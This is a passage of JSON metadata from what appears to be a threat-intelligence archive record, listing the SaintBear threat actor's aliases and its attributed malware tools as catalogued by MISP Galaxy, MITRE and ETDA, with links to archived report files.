"updated_at": "2026-04-10T02:00:03.296196Z", "deleted_at": null, "main_name": "SaintBear", "aliases": [ "Bleeding Bear", "Cadet Blizzard", "Nascent Ursa", "Nodaria", "Storm-0587", "DEV-0587", "Saint Bear", "EMBER BEAR", "UNC2589", "TA471", "UAC-0056", "FROZENVISTA", "Lorec53", "Lorec Bear" ], "source_name": "MISPGALAXY:SaintBear", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "03a6f362-cbab-4ce9-925d-306b8c937bf1", "created_at": "2024-11-01T02:00:52.635907Z", "updated_at": "2026-04-10T02:00:05.339384Z", "deleted_at": null, "main_name": "Saint Bear", "aliases": [ "Saint Bear", "Storm-0587", "TA471", "UAC-0056", "Lorec53" ], "source_name": "MITRE:Saint Bear", "tools": [ "OutSteel", "Saint Bot" ], "source_id": "MITRE", "reports": null }, { "id": "083d63b2-3eee-42a8-b1bd-54e657a229e8", "created_at": "2022-10-25T16:07:24.143338Z", "updated_at": "2026-04-10T02:00:04.879634Z", "deleted_at": null, "main_name": "SaintBear", "aliases": [ "Ember Bear", "FROZENVISTA", "G1003", "Lorec53", "Nascent Ursa", "Nodaria", "SaintBear", "Storm-0587", "TA471", "UAC-0056", "UNC2589" ], "source_name": "ETDA:SaintBear", "tools": [ "Agentemis", "Cobalt Strike", "CobaltStrike", "Elephant Client", "Elephant Implant", "GraphSteel", "Graphiron", "GrimPlant", "OutSteel", "Saint Bot", "SaintBot", "cobeacon" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434231, "ts_updated_at": 1775826678, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/96e3a887c522c6d8d74b053bf93faca97a312a7c.pdf", "text": "https://archive.orkl.eu/96e3a887c522c6d8d74b053bf93faca97a312a7c.txt", "img": "https://archive.orkl.eu/96e3a887c522c6d8d74b053bf93faca97a312a7c.jpg" } }